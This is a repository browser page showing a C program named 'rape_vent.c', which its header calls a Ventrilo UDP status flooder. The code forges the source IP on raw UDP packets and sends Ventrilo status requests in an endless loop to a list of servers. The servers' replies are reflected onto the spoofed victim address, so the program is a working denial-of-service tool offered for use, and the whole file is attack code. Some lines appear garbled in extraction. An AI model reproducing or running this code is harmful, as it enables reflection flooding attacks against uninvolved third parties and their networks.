Context Navigation

rape_vent.c @ 622

Revision 605, 14.6 KB checked in by literalka, 16 months ago (diff)
more sorting, jesus fuck

Line
1	/* sloth@ww88.org - 2008.12.03
2	*
3	* Ventrilo UDP status flooder v3.0.0
4	*
5	*/
6
7	#include <stdio.h>
8	#include <unistd.h>
9	#include <stdarg.h>
10	#include <stdlib.h>
11	#include <sys/types.h>
12	#include <sys/socket.h>
13	#include <netdb.h>
14	#include <netinet/in.h>
15	#include <arpa/inet.h>
16	#include <string.h>
17	#include <errno.h>
18	#include <time.h>
19	#include <stdint.h>
20
21	/* UDP status protocol reverse engineering done by
22	* http://aluigi.altervista.org Luigi Auriemma
23	*/
24
25	typedef struct {
26	unsigned short pckkey; // key for decoding this header
27	unsigned short zero; // ever 0
28	unsigned short cmd; // command number: 1 generic info, 2 for details
29	unsigned short id; // packet ID used for tracking the replies
30	unsigned short totlen; // total data size (for data splitted in packets)
31	unsigned short len; // size of the data in this packet (max 492)
32	unsigned short totpck; // total amount of packets (max 32)
33	unsigned short pck; // current packet number
34	unsigned short datakey; // key for decoding the data
35	unsigned short crc; // checksum of the total plain-text data
36	} ventrilo_udp_head;
37
38	const static unsigned char ventrilo_udp_encdata_head[] =
39	"\x80\xe5\x0e\x38\xba\x63\x4c\x99\x88\x63\x4c\xd6\x54\xb8\x65\x7e"
40	"\xbf\x8a\xf0\x17\x8a\xaa\x4d\x0f\xb7\x23\x27\xf6\xeb\x12\xf8\xea"
41	"\x17\xb7\xcf\x52\x57\xcb\x51\xcf\x1b\x14\xfd\x6f\x84\x38\xb5\x24"
42	"\x11\xcf\x7a\x75\x7a\xbb\x78\x74\xdc\xbc\x42\xf0\x17\x3f\x5e\xeb"
43	"\x74\x77\x04\x4e\x8c\xaf\x23\xdc\x65\xdf\xa5\x65\xdd\x7d\xf4\x3c"
44	"\x4c\x95\xbd\xeb\x65\x1c\xf4\x24\x5d\x82\x18\xfb\x50\x86\xb8\x53"
45	"\xe0\x4e\x36\x96\x1f\xb7\xcb\xaa\xaf\xea\xcb\x20\x27\x30\x2a\xae"
46	"\xb9\x07\x40\xdf\x12\x75\xc9\x09\x82\x9c\x30\x80\x5d\x8f\x0d\x09"
47	"\xa1\x64\xec\x91\xd8\x8a\x50\x1f\x40\x5d\xf7\x08\x2a\xf8\x60\x62"
48	"\xa0\x4a\x8b\xba\x4a\x6d\x00\x0a\x93\x32\x12\xe5\x07\x01\x65\xf5"
49	"\xff\xe0\xae\xa7\x81\xd1\xba\x25\x62\x61\xb2\x85\xad\x7e\x9d\x3f"
50	"\x49\x89\x26\xe5\xd5\xac\x9f\x0e\xd7\x6e\x47\x94\x16\x84\xc8\xff"
51	"\x44\xea\x04\x40\xe0\x33\x11\xa3\x5b\x1e\x82\xff\x7a\x69\xe9\x2f"
52	"\xfb\xea\x9a\xc6\x7b\xdb\xb1\xff\x97\x76\x56\xf3\x52\xc2\x3f\x0f"
53	"\xb6\xac\x77\xc4\xbf\x59\x5e\x80\x74\xbb\xf2\xde\x57\x62\x4c\x1a"
54	"\xff\x95\x6d\xc7\x04\xa2\x3b\xc4\x1b\x72\xc7\x6c\x82\x60\xd1\x0d";
55
56	const static unsigned char ventrilo_udp_encdata_data[] =
57	"\x82\x8b\x7f\x68\x90\xe0\x44\x09\x19\x3b\x8e\x5f\xc2\x82\x38\x23"
58	"\x6d\xdb\x62\x49\x52\x6e\x21\xdf\x51\x6c\x76\x37\x86\x50\x7d\x48"
59	"\x1f\x65\xe7\x52\x6a\x88\xaa\xc1\x32\x2f\xf7\x54\x4c\xaa\x6d\x7e"
60	"\x6d\xa9\x8c\x0d\x3f\xff\x6c\x09\xb3\xa5\xaf\xdf\x98\x02\xb4\xbe"
61	"\x6d\x69\x0d\x42\x73\xe4\x34\x50\x07\x30\x79\x41\x2f\x08\x3f\x42"
62	"\x73\xa7\x68\xfa\xee\x88\x0e\x6e\xa4\x70\x74\x22\x16\xae\x3c\x81"
63	"\x14\xa1\xda\x7f\xd3\x7c\x48\x7d\x3f\x46\xfb\x6d\x92\x25\x17\x36"
64	"\x26\xdb\xdf\x5a\x87\x91\x6f\xd6\xcd\xd4\xad\x4a\x29\xdd\x7d\x59"
65	"\xbd\x15\x34\x53\xb1\xd8\x50\x11\x83\x79\x66\x21\x9e\x87\x5b\x24"
66	"\x2f\x4f\xd7\x73\x34\xa2\xf7\x09\xd5\xd9\x42\x9d\xf8\x15\xdf\x0e"
67	"\x10\xcc\x05\x04\x35\x81\xb2\xd5\x7a\xd2\xa0\xa5\x7b\xb8\x75\xd2"
68	"\x35\x0b\x39\x8f\x1b\x44\x0e\xce\x66\x87\x1b\x64\xac\xe1\xca\x67"
69	"\xb4\xce\x33\xdb\x89\xfe\xd8\x8e\xcd\x58\x92\x41\x50\x40\xcb\x08"
70	"\xe1\x15\xee\xf4\x64\xfe\x1c\xee\x25\xe7\x21\xe6\x6c\xc6\xa6\x2e"
71	"\x52\x23\xa7\x20\xd2\xd7\x28\x07\x23\x14\x24\x3d\x45\xa5\xc7\x90"
72	"\xdb\x77\xdd\xea\x38\x59\x89\x32\xbc\x00\x3a\x6d\x61\x4e\xdb\x29";
73
74	void ventrilo_udp_head_dec(unsigned char *data) {
75	int i;
76	unsigned short *p;
77	unsigned char a1,
78	a2;
79
80	p = (unsigned short *)data;
81	data += 2;
82
83	p = ntohs(p);
84	a1 = *p;
85	if(!a1) return;
86	a2 = *p >> 8;
87
88	for(i = 0; i < 18; i++) {
89	data[i] -= ventrilo_udp_encdata_head[a2] + (i % 5);
90	a2 += a1;
91	}
92
93	for(i = 0; i < 9; i++) {
94	p++;
95	p = ntohs(p);
96	}
97	}
98
99	void ventrilo_udp_head_enc(unsigned char *data) {
100	int i;
101	unsigned short *p;
102	unsigned char a1,
103	a2;
104
105	p = (unsigned short *)data;
106	data += 2;
107
108	p = (((times(0) 0x343fd) + 0x269ec3) >> 16) & 0x7fff;
109	a1 = *p;
110	a2 = *p >> 8;
111	if(!a2) {
112	a2 = 69;
113	*p \|= (a2 << 8);
114	}
115
116	for(i = 0; i < 10; i++) {
117	p = htons(p);
118	p++;
119	}
120
121	for(i = 0; i < 18; i++) {
122	data[i] += ventrilo_udp_encdata_head[a2] + (i % 5);
123	a2 += a1;
124	}
125	}
126
127	void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short key) {
128	int i;
129	unsigned char a1,
130	a2;
131
132	a1 = key;
133	if(!a1) return;
134	a2 = key >> 8;
135
136	for(i = 0; i < len; i++) {
137	data[i] -= ventrilo_udp_encdata_data[a2] + (i % 72);
138	a2 += a1;
139	}
140	}
141
142	unsigned short ventrilo_udp_data_enc(unsigned char *data, int len) {
143	int i;
144	unsigned short key;
145	unsigned char a1,
146	a2;
147
148	key = (((times(0) * 0x343fd) + 0x269ec3) >> 16) & 0x7fff;
149	a1 = key;
150	a2 = key >> 8;
151	if(!a2) {
152	a2 = 1;
153	key \|= (a2 << 8);
154	}
155
156	for(i = 0; i < len; i++) {
157	data[i] += ventrilo_udp_encdata_data[a2] + (i % 72);
158	a2 += a1;
159	}
160
161	return(key);
162	}
163
164	unsigned short ventrilo_udp_crc(unsigned char *data, int len) {
165	unsigned short crc = 0;
166	const static unsigned short table[] = {
167	0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
168	0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
169	0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
170	0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
171	0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
172	0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
173	0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
174	0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
175	0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
176	0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
177	0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
178	0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
179	0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
180	0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
181	0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
182	0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
183	0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
184	0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
185	0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
186	0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
187	0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
188	0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
189	0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
190	0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
191	0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
192	0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
193	0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
194	0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
195	0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
196	0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
197	0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
198	0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0
199	};
200
201	while(len--) {
202	crc = table[crc >> 8] ^ *data ^ (crc << 8);
203	data++;
204	}
205
206	return(crc);
207	}
208
209	/* END Luigi Auriemma CODE */
210
211	#define VENTHEADERSIZE 20
212	#define VENTPASSSIZE 16
213	#define VENTPACKETSIZE VENTHEADERSIZE + VENTPASSSIZE
214
215	struct ip_header {
216	uint8_t ihl:4,
217	version:4;
218	uint8_t tos;
219	uint16_t tot_len;
220	uint16_t id;
221	uint16_t frag_off;
222	uint8_t ttl;
223	uint8_t protocol;
224	uint16_t check;
225	uint32_t saddr;
226	uint32_t daddr;
227	};
228
229	struct udp_header {
230	uint16_t source;
231	uint16_t dest;
232	uint16_t len;
233	uint16_t check;
234	};
235
236	struct udp_packet {
237	struct ip_header iph;
238	struct udp_header udph;
239	};
240
241	struct Ventserver {
242	struct in_addr host;
243	uint16_t port;
244	char *pass;
245	int sock;
246	struct sockaddr_in sin;
247	struct udp_packet *udp_packet;
248	};
249
250	void usage() {
251	fprintf(stderr, "usage: ./rape_vent <vent list file> <src ip> [src port]\n");
252	exit(-1);
253	}
254
255	void fatal(char *reason) {
256	fprintf(stderr, "fatal: %s\n", reason);
257	exit(-1);
258	}
259
260	unsigned short csum(unsigned short *addr, int len) {
261	register int sum = 0;
262	u_short answer = 0;
263	register u_short *w = addr;
264	register int nleft = len;
265
266	while (nleft > 1) {
267	sum += *w++;
268	nleft -= 2;
269	}
270
271	if (nleft == 1) {
272	(u_char )(&answer) = (u_char )w ;
273	sum += answer;
274	}
275
276	sum = (sum >> 16) + (sum & 0xffff);
277	sum += (sum >> 16);
278	answer = ~sum;
279	return(answer); /* return the checksum value. */
280	}
281
282	struct udp_packet *alloc_packet(size_t datalen) {
283	struct udp_packet *packet;
284	struct ip_header *iph;
285	struct udp_header *udph;
286
287	if(!(packet = calloc(1, sizeof(struct udp_packet) + datalen)))
288	fatal("error: allocating udp packet");
289
290	iph = &packet->iph;
291	udph = &packet->udph;
292
293	iph->ihl = 5;
294	iph->version = 4;
295	iph->tos = 0;
296	iph->tot_len = sizeof(struct udp_packet) + datalen;
297	iph->id = 1 + (int)(65000.0 * (rand() / (RAND_MAX + 1.0)));;
298	iph->frag_off = 0;
299	iph->ttl = 255;
300
301	iph->protocol = 17;
302
303	udph->len = htons(sizeof(struct udp_header) + datalen);
304
305	return(packet);
306	}
307
308	void vent_packet(ventrilo_udp_head vent_header, char pass, uint16_t cmd) {
309	char *data;
310
311	data = (char *)vent_header + VENTHEADERSIZE;
312	strncpy(data, pass, VENTPASSSIZE);
313
314	vent_header->zero = 0;
315	vent_header->cmd = cmd;
316	vent_header->id = time(0);
317	vent_header->totlen = VENTPASSSIZE;
318	vent_header->len = VENTPASSSIZE;
319	vent_header->totpck = 1;
320	vent_header->pck = 0;
321	vent_header->crc = ventrilo_udp_crc(data, VENTPASSSIZE);
322	vent_header->datakey = ventrilo_udp_data_enc(data, VENTPASSSIZE);
323	ventrilo_udp_head_enc((char *)vent_header);
324	}
325
326	void init_packet(long source, int sport, long dest, int port,
327	struct udp_packet udp_packet, char pass, uint16_t cmd) {
328	struct ip_header *iph;
329	struct udp_header *udph;
330	char *udp_data;
331
332	iph = &udp_packet->iph;
333	udph = &udp_packet->udph;
334
335	iph->saddr = source;
336	iph->daddr = dest;
337	iph->check = 0; // csum((unsigned short *)iph, sizeof(struct ip_header));
338
339	udph->check = 0;
340	udph->source = htons(sport);
341	udph->dest = htons(port);
342
343	udp_data = (char *)udp_packet + sizeof(struct udp_packet);
344	vent_packet((ventrilo_udp_head *)udp_data, pass, cmd);
345	}
346
347	void do_spoof(struct in_addr src, uint16_t sport,
348	struct Ventserver *server_list) {
349	struct udp_packet *udp_packet;
350	uint32_t cur = 0;
351	struct in_addr dst;
352	unsigned int i, x = 0, bits = 0, s, olen;
353
354	for(i = 0; server_list[i].host.s_addr; i++) {
355
356	udp_packet = alloc_packet(VENTPACKETSIZE);
357
358	init_packet(src.s_addr, sport, server_list[i].host.s_addr,
359	server_list[i].port, udp_packet, server_list[i].pass, 2);
360
361	server_list[i].udp_packet = udp_packet;
362
363	dst = server_list[i].host;
364
365	server_list[i].sin.sin_family = AF_INET;
366	server_list[i].sin.sin_addr = dst;
367	server_list[i].sin.sin_port = htons(sport);
368
369	if((s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP)) < 0) {
370	fprintf(stderr, "%s: ERROR send_packet() -> socket()\n", inet_ntoa(dst));
371	s = 0;
372	}
373	else if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &olen, sizeof(olen)) < 0) {
374	fprintf(stderr, "ERROR: could not set socket option IP_HDRINCL.\n");
375	close(s);
376	s = 0;
377	}
378
379	server_list[i].sock = s;
380	}
381
382	while(1) {
383	for(i = 0; server_list[i].host.s_addr; i++) {
384
385	sendto(server_list[i].sock, server_list[i].udp_packet,
386	sizeof(struct udp_packet) + VENTPACKETSIZE, 0,
387	(struct sockaddr *)&server_list[i].sin,
388	sizeof(server_list[i].sin));
389
390	}
391
392	}
393
394	}
395
396	long resolve(char *host) {
397	struct in_addr ip;
398	struct hostent *he;
399
400	if((ip.s_addr = inet_addr(host)) == -1) {
401	if(!(he = gethostbyname(host)))
402	return(-1);
403	else
404	memcpy(&ip.s_addr, he->h_addr, 4);
405	}
406	return(ip.s_addr);
407	}
408
409	struct Ventserver read_servers(char filename) {
410	FILE *fp;
411	uint32_t len = 0, count = 0, i;
412	struct Ventserver *server_list;
413	struct in_addr ip;
414	char buffer[256], arg[3][256], *p = NULL;
415
416	if(!(fp = fopen(filename, "r"))) {
417	fprintf(stderr, "Error: can't open file: %s\n", filename);
418	exit(-1);
419	}
420
421	len = 256 * sizeof(struct Ventserver);
422
423	if(!(server_list = malloc(len))) {
424	fprintf(stderr, "Error: malloc\n");
425	exit(-1);
426	}
427
428	while(fgets(buffer, sizeof(buffer), fp)) {
429
430	if (count >= (len / sizeof(struct Ventserver)) - 2) {
431	if (!(server_list = realloc(server_list, len +
432	(256 * sizeof(struct Ventserver))))) {
433	fprintf(stderr, "Error: realloc\n");
434	exit(-1);
435	}
436
437	len += 256 * sizeof(struct Ventserver);
438	}
439
440	if(buffer[strlen(buffer) - 1] == '\n')
441	buffer[strlen(buffer) - 1] = 0;
442
443	arg[0][0] = 0;
444	arg[1][0] = 0;
445	arg[2][0] = 0;
446
447	p = NULL;
448
449	for(i = 0; i < 3; i++) {
450	if(!(p = strtok(p ? NULL : buffer, " ")))
451	break;
452
453	strncpy(arg[i], p, sizeof(arg[i]) - 1);
454	}
455
456	if(!arg[1][0])
457	continue;
458
459	if((server_list[count].host.s_addr = resolve(arg[0])) == -1)
460	continue;
461
462	server_list[count].port = atoi(arg[1]);
463
464	if(arg[2][0])
465	server_list[count].pass = strdup(arg[2]);
466	else
467	server_list[count].pass = strdup("");
468
469	printf("%s:%d - %s\n", arg[0], server_list[count].port, arg[2]);
470	count++;
471
472	}
473
474	printf("* Loaded %u Ventrilo servers *\n", count);
475
476	if(!count) {
477	fprintf(stderr, "Error: 0 Ventrilo servers found\n");
478	exit(-1);
479	}
480
481	server_list[count].host.s_addr = 0;
482
483	return(server_list);
484	}
485
486	int main(int argc, char *argv[]) {
487	int i, sport;
488	uint32_t rate;
489	struct Ventserver *server_list;
490	struct in_addr src_ip;
491
492	printf("###### rape_vent.c - sloth@ww88.org ######\n");
493
494	if(argc < 3)
495	usage();
496
497	server_list = read_servers(argv[1]);
498
499	if(!(src_ip = malloc((argc - 2) + 1))) {
500	fprintf(stderr, "Error: malloc()\n");
501	exit(-1);
502	}
503
504	src_ip.s_addr = 0;
505
506	if((src_ip.s_addr = resolve(argv[2])) == -1)
507	fatal("source host invalid");
508
509	srand(getpid() * getuid() + time(0));
510
511	sport = 1024 + (int)(65000.0 * (rand() / (RAND_MAX + 1024.0)));
512
513	do_spoof(src_ip, sport, server_list);
514
515	}

Note: See TracBrowser for help on using the repository browser.

Context Navigation

source: trollforge/misc/ventrilo/rape_vent.c @ 622

Download in other formats: